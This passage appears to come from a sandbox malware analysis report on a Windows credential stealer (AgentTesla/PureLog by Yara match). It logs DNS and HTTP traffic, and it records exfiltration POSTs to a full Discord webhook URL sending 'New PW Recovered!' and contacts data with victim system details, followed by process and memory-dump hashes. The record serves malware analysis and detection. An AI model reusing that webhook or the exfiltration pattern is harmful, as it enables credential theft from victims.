Mar 28, 2024 13:58:57.235783100 CET	443	49731	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:57.423928976 CET	443	49731	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:57.424067974 CET	443	49731	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:57.424164057 CET	49731	443	192.168.2.4	162.159.137.232
Mar 28, 2024 13:58:57.424724102 CET	49731	443	192.168.2.4	162.159.137.232

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 28, 2024 13:58:54.942665100 CET	57918	53	192.168.2.4	1.1.1.1
Mar 28, 2024 13:58:55.046989918 CET	53	57918	1.1.1.1	192.168.2.4
Mar 28, 2024 13:58:55.954102039 CET	61626	53	192.168.2.4	1.1.1.1
Mar 28, 2024 13:58:56.049057007 CET	53	61626	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 28, 2024 13:58:54.942665100 CET	192.168.2.4	1.1.1.1	0x784c	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Mar 28, 2024 13:58:55.954102039 CET	192.168.2.4	1.1.1.1	0x36b5	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 28, 2024 13:58:55.046989918 CET	1.1.1.1	192.168.2.4	0x784c	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Mar 28, 2024 13:58:56.049057007 CET	1.1.1.1	192.168.2.4	0x36b5	No error (0)	discord.com	162.159.137.232	A (IP address)	IN (0x0001)	false
Mar 28, 2024 13:58:56.049057007 CET	1.1.1.1	192.168.2.4	0x36b5	No error (0)	discord.com	162.159.138.232	A (IP address)	IN (0x0001)	false
Mar 28, 2024 13:58:56.049057007 CET	1.1.1.1	192.168.2.4	0x36b5	No error (0)	discord.com	162.159.128.233	A (IP address)	IN (0x0001)	false
Mar 28, 2024 13:58:56.049057007 CET	1.1.1.1	192.168.2.4	0x36b5	No error (0)	discord.com	162.159.136.232	A (IP address)	IN (0x0001)	false
Mar 28, 2024 13:58:56.049057007 CET	1.1.1.1	192.168.2.4	0x36b5	No error (0)	discord.com	162.159.135.232	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

discord.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49729	208.95.112.1	80	7340	C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 13:58:55.207818985 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Mar 28, 2024 13:58:55.333668947 CET	175	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 12:58:55 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	162.159.137.232	443	7340	C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 12:58:56 UTC	387	OUT	POST /api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubgOFeoq2CnEl3NjjJYkJNd HTTP/1.1 Content-Type: multipart/form-data; boundary=----------bbf04aceaf2e4ca780dd290cb3f9ba1c User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: discord.com Content-Length: 1168 Expect: 100-continue Connection: Keep-Alive
2024-03-28 12:58:56 UTC	25	IN	HTTP/1.1 100 Continue
2024-03-28 12:58:56 UTC	1168	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 62 62 66 30 34 61 63 65 61 66 32 65 34 63 61 37 38 30 64 64 32 39 30 63 62 33 66 39 62 61 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 6e 61 6d 65 22 0d 0a 0d 0a 6a 6f 6e 65 73 2d 35 32 38 31 31 30 20 32 30 32 34 2d 30 33 2d 32 38 20 31 33 2d 35 38 2d 35 35 2e 68 74 6d 6c 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 62 62 66 30 34 61 63 65 61 66 32 65 34 63 61 37 38 30 64 64 32 39 30 63 62 33 66 39 62 61 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 66 6f 72 6d 61 74 22 0d 0a 0d 0a 68 74 6d 6c 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 62 62 Data Ascii: ------------bbf04aceaf2e4ca780dd290cb3f9ba1cContent-Disposition: form-data; name="filename"user-528110 2024-03-28 13-58-55.html------------bbf04aceaf2e4ca780dd290cb3f9ba1cContent-Disposition: form-data; name="fileformat"html------------bb
2024-03-28 12:58:56 UTC	1369	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 12:58:56 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close set-cookie: __dcfduid=effb2dd4ed0211eeb5d426688c8132a5; Expires=Tue, 27-Mar-2029 12:58:56 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1711630737 x-ratelimit-reset-after: 1 vary: Accept-Encoding via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rPbOKPFnatwgzZcPQn%2Bf0TIxkDzFHe6xlvZlIKA0Y171R%2FQXT6ohARS1aJQXJ9MMooVsgSW9Ragg%2FlJ%2BC%2F%2BWTWIEWHVDZoMMAY5XP9Cxcnw1ifIWOA%2B0R6VqW8jq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=effb2dd4ed0211eeb5d426688c8132a5068e8a62b2a96d2ee6f3d5dd64075c958362c1fff25cc7b6bee0deee6d73edea; Expires=Tue, 27-Mar-2029 12:58:56 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=1630cf4dd8bf069a35a06a9beafd86e864c4fbb7-1711630736; path=/; domain=.discord.com; HttpO
2024-03-28 12:58:56 UTC	239	IN	Data Raw: 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 41 6f 56 63 41 6c 67 4b 6d 31 51 75 66 6f 74 5a 55 2e 46 44 66 75 55 46 51 52 54 47 51 61 56 34 75 67 44 78 59 33 72 6e 41 46 55 2d 31 37 31 31 36 33 30 37 33 36 37 33 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 36 62 37 63 62 36 36 63 38 64 33 32 30 34 62 2d 49 41 44 0d 0a 0d 0a Data Ascii: nly; Secure; SameSite=NoneSet-Cookie: _cfuvid=AoVcAlgKm1QufotZU.FDfuUFQRTGQaV4ugDxY3rnAFU-1711630736736-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 86b7cb66c8d3204b-IAD
2024-03-28 12:58:56 UTC	1269	IN	Data Raw: 34 65 65 0d 0a 7b 22 69 64 22 3a 22 31 32 32 32 38 39 32 36 38 35 39 36 33 30 33 38 38 30 33 22 2c 22 74 79 70 65 22 3a 30 2c 22 63 6f 6e 74 65 6e 74 22 3a 22 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 5c 6e 5c 6e 54 69 6d 65 3a 20 30 33 2f 32 38 2f 32 30 32 34 20 31 33 3a 35 38 3a 35 35 5c 6e 55 73 65 72 20 4e 61 6d 65 3a 20 6a 6f 6e 65 73 2f 35 32 38 31 31 30 5c 6e 4f 53 46 75 6c 6c 4e 61 6d 65 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 43 50 55 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 52 41 4d 3a 20 38 31 39 31 2e 32 35 20 4d 42 22 2c 22 63 68 61 6e 6e 65 6c 5f 69 64 22 3a 22 31 32 32 30 35 33 34 33 37 38 39 37 35 38 35 Data Ascii: 4ee{"id":"1222892685963038803","type":0,"content":"New PW Recovered!\n\nTime: 03/28/2024 13:58:55\nUser Name: user/528110\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB","channel_id":"122053437897585
2024-03-28 12:58:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	162.159.137.232	443	7340	C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 12:58:57 UTC	362	OUT	POST /api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubgOFeoq2CnEl3NjjJYkJNd HTTP/1.1 Content-Type: multipart/form-data; boundary=----------9f8a08985d6743459b05911f9073b2ab User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: discord.com Content-Length: 429 Expect: 100-continue
2024-03-28 12:58:57 UTC	25	IN	HTTP/1.1 100 Continue
2024-03-28 12:58:57 UTC	429	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 39 66 38 61 30 38 39 38 35 64 36 37 34 33 34 35 39 62 30 35 39 31 31 66 39 30 37 33 62 32 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 73 65 72 6e 61 6d 65 22 0d 0a 0d 0a 6a 6f 6e 65 73 2f 35 32 38 31 31 30 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 39 66 38 61 30 38 39 38 35 64 36 37 34 33 34 35 39 62 30 35 39 31 31 66 39 30 37 33 62 32 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 6f 6e 74 65 6e 74 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6e 74 61 63 74 73 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 38 2f 32 30 32 34 20 31 35 3a 30 38 3a Data Ascii: ------------9f8a08985d6743459b05911f9073b2abContent-Disposition: form-data; name="username"user/528110------------9f8a08985d6743459b05911f9073b2abContent-Disposition: form-data; name="content"New Contacts Recovered!Time: 03/28/2024 15:08:
2024-03-28 12:58:57 UTC	1369	IN	HTTP/1.1 204 No Content Date: Thu, 28 Mar 2024 12:58:57 GMT Content-Type: text/html; charset=utf-8 Connection: close set-cookie: __dcfduid=f0600b96ed0211ee9bd86e2dec408269; Expires=Tue, 27-Mar-2029 12:58:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1711630738 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OurxZZVjgB8WPoD0Slk5N1nXiRjENhT6uBdC%2BAZ0Dxdkn6H2jtk5uUS%2FuTmUIeq016XeCiGYhUcCRD%2FpaAm%2BByNN6hnycS1nHVL6ZK7qMH5jXHaZDP0glAXqXPR7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=f0600b96ed0211ee9bd86e2dec408269840ea4f2841ab689c0b71f7c4665819e6b62a8eebfc35ed4aa7a710040a1b622; Expires=Tue, 27-Mar-2029 12:58:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=f5dd942da8c35e95aa4d01038d9734a1a2e00fb1-1711630737; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Set-Cookie: _
2024-03-28 12:58:57 UTC	198	IN	Data Raw: 63 66 75 76 69 64 3d 7a 79 4f 5f 62 58 4e 63 6b 78 6b 54 4a 53 53 75 63 33 47 47 41 49 6d 67 45 2e 31 58 56 47 33 58 77 79 74 73 64 50 33 6f 50 58 51 2d 31 37 31 31 36 33 30 37 33 37 33 37 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 36 62 37 63 62 36 62 36 65 36 64 32 30 39 63 2d 49 41 44 0d 0a 0d 0a Data Ascii: cfuvid=zyO_bXNckxkTJSSuc3GGAImgE.1XVG3XwytsdP3oPXQ-1711630737374-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 86b7cb6b6e6d209c-IAD

Target ID:	0
Start time:	13:58:52
Start date:	28/03/2024
Path:	C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe"
Imagebase:	0x960000
File size:	2'987'520 bytes
MD5 hash:	73F2AA0989D9FCB98763FBB461422F9F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1650117594.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1647338287.00000000055E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1641702888.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1641702888.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:58:53
Start date:	28/03/2024
Path:	C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe"
Imagebase:	0x500000
File size:	2'987'520 bytes
MD5 hash:	73F2AA0989D9FCB98763FBB461422F9F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	13.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	336
Total number of Limit Nodes:	8

Executed Functions

Function 05AD1209 Relevance: 16.0, Strings: 12, Instructions: 1043COMMON

Download Yara Rule

Strings

$^q, xrefs: 05AD1BFA
$^q, xrefs: 05AD1B91
$^q, xrefs: 05AD1707
$^q, xrefs: 05AD17C7
$^q, xrefs: 05AD1543
$^q, xrefs: 05AD1717
$^q, xrefs: 05AD1BA1
$^q, xrefs: 05AD1553
,bq, xrefs: 05AD1D7A
$^q, xrefs: 05AD17B7
$^q, xrefs: 05AD1BEA
4, xrefs: 05AD1C95

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-312445597
Opcode ID: 5eeb01e14625490a8ab0c1ec89c281b6e1e38068407b9237588bb6689f35e5dc
Instruction ID: 4cb761cbc3a916a33ab3f3675db37aa36cc75f6a9797a5cbaecfb84a242fad8b
Opcode Fuzzy Hash: 5eeb01e14625490a8ab0c1ec89c281b6e1e38068407b9237588bb6689f35e5dc
Instruction Fuzzy Hash: C0A21834A00218DFDB18DFA4C894FADB7B6BF88700F148599E516AB2A5DB71EC45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 05AD12B0 Relevance: 9.4, Strings: 7, Instructions: 685COMMON

Download Yara Rule

Strings

$^q, xrefs: 05AD1B91
$^q, xrefs: 05AD1707
$^q, xrefs: 05AD1543
,bq, xrefs: 05AD1D7A
$^q, xrefs: 05AD17B7
$^q, xrefs: 05AD1BEA
4, xrefs: 05AD1C95

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q
API String ID: 0-1692521823
Opcode ID: 8071a7cd82892377e2ddab0ed95ce1222f5e3b1fd7ae4f22f9fbe5f2c8a86845
Instruction ID: b280419f3a68497af3a6ecf1f8f1848e5fcfdd88ca9246bdedbc1adaada181c2
Opcode Fuzzy Hash: 8071a7cd82892377e2ddab0ed95ce1222f5e3b1fd7ae4f22f9fbe5f2c8a86845
Instruction Fuzzy Hash: F762DA74A00218CFDB14DFA5C994FA9B7B2BF48700F1481A5E51AAB3A5DB71ED81CF60

Uniqueness

Uniqueness Score: -1.00%

Function 05AD15E7 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

$^q, xrefs: 05AD1B91
$^q, xrefs: 05AD1707
,bq, xrefs: 05AD1D7A
$^q, xrefs: 05AD17B7
$^q, xrefs: 05AD1BEA
4, xrefs: 05AD1C95

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q
API String ID: 0-2546334966
Opcode ID: bb35fa65147f735f868a92aeae4e59b2eb24ce15bf618d83d91b48c588272f13
Instruction ID: 6551cbc3345595e65f689505ca0c3423619797997a84ae1eaaadb2ccbe49a26e
Opcode Fuzzy Hash: bb35fa65147f735f868a92aeae4e59b2eb24ce15bf618d83d91b48c588272f13
Instruction Fuzzy Hash: 1F22ED34A00218DFDB24DF64C994FADB7B2BF48700F1481A5E51AAB3A5DB71AD85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 05C0EBB8 Relevance: 7.2, Strings: 5, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 05C0F2DB
TJcq, xrefs: 05C0ED5A
xbaq, xrefs: 05C0ECE5
pbq, xrefs: 05C0F772
4'^q, xrefs: 05C0F68B

Memory Dump Source

Source File: 00000000.00000002.1650051244.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 4'^q$TJcq$Te^q$pbq$xbaq
API String ID: 0-2576840827
Opcode ID: 06fcd76027237f63ba91e0f53b09a9c67cc2f4b780bcfd8e3d27a08c4fb831d7
Instruction ID: e1aed5720432e8254e1dc80cef6ac1d4e74ea9bcc2c718d17435ec9a3e9f80cc
Opcode Fuzzy Hash: 06fcd76027237f63ba91e0f53b09a9c67cc2f4b780bcfd8e3d27a08c4fb831d7
Instruction Fuzzy Hash: 4BA2C775A00228CFDB64CF69C984AD9BBB2FF89304F1585E9D509AB365DB319E81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 05AD4D28 Relevance: 4.4, Strings: 3, Instructions: 663COMMON

Download Yara Rule

Strings

(_^q, xrefs: 05AD54E3
$^q, xrefs: 05AD4FF6
Pl^q, xrefs: 05AD4F10

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: (_^q$Pl^q$$^q
API String ID: 0-912065397
Opcode ID: e1ef865a70c13b4f38d900be4e2d55849c9a54d49f0c90b4a07202a1ca863203
Instruction ID: c91533d0c35e25cfd3d7eb84475b918a0fdcdf569ec999ef13a3fa4a595b7b98
Opcode Fuzzy Hash: e1ef865a70c13b4f38d900be4e2d55849c9a54d49f0c90b4a07202a1ca863203
Instruction Fuzzy Hash: 20423A34B002048FCB14EF69C558E6ABBF6BF89701B2584A9E516CF365DB71EC42CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02F6A130 Relevance: 3.6, Strings: 2, Instructions: 1081
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 02F6A630
2, xrefs: 02F6AC70

Memory Dump Source

Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 2$$^q
API String ID: 0-1071376767
Opcode ID: 2fde18745cca862a53da1c000b9826442d59fea87780dca553cf3569b3089ab6
Instruction ID: 470d80bb77b377c74a25b25e596a55d7655de760fe3ee413c7259c0d1a8dac4f
Opcode Fuzzy Hash: 2fde18745cca862a53da1c000b9826442d59fea87780dca553cf3569b3089ab6
Instruction Fuzzy Hash: CFC2C574E01229CFCB64DF69D984B99BBB6FB89300F1081EAD909A7355DB309E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05B716B0 Relevance: 1.9, Strings: 1, Instructions: 643COMMON

Download Yara Rule

Strings

(bq, xrefs: 05B71868

Memory Dump Source

Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: eee4b38f30a15ac2903f9d81eeb258406f8546b207ad69abb37c8921ac74da7c
Instruction ID: 14f71a54cad0fcdde7cdd6486dda13bfdbaa60a3d7c4345371f31c0a95190004
Opcode Fuzzy Hash: eee4b38f30a15ac2903f9d81eeb258406f8546b207ad69abb37c8921ac74da7c
Instruction Fuzzy Hash: F5328D70B0461A9FCB14DF69C49566EFBF2FF88300F248569E56AD7391DB34A901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05B464F0 Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05B46643

Memory Dump Source

Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 7d24feb9a31089ff13ceacea75f1836c8d8dc2b845f46f12349d76733f1cb05b
Instruction ID: fa7878bc2c66ea54798ca303cb262491584a28d990b3e1280858d2af4c8dbc21
Opcode Fuzzy Hash: 7d24feb9a31089ff13ceacea75f1836c8d8dc2b845f46f12349d76733f1cb05b
Instruction Fuzzy Hash: E1B11874E45218CFDB24CFA9D984BADBBF2FF4A300F1190A9E40AA7255DB746985DF00

Uniqueness

Uniqueness Score: -1.00%

Function 02F6B51C Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d94b3548cd4a382083f57ce88410dcb50444e7b2f1ec70afba8eae7522dc1de
Instruction ID: 1f97c420d3dbd2cfa19d9d79a6369c0bf1f2d3e37a6285b1c5b3b7a50dc9c5fc
Opcode Fuzzy Hash: 6d94b3548cd4a382083f57ce88410dcb50444e7b2f1ec70afba8eae7522dc1de
Instruction Fuzzy Hash: F932C474A40229CFCB65DF28C988AA9BBB6FF48304F1085D9D90DA7351DB31AE85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 05B7D530 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64f1c61caec5511cb1f5485b278b2e90ca311c1c4a8ae6262f4e21286b949cbe
Instruction ID: 8ce94775631c000fc9ec377ee60e6002ff958c349b4b479a9222c41b8f46d207
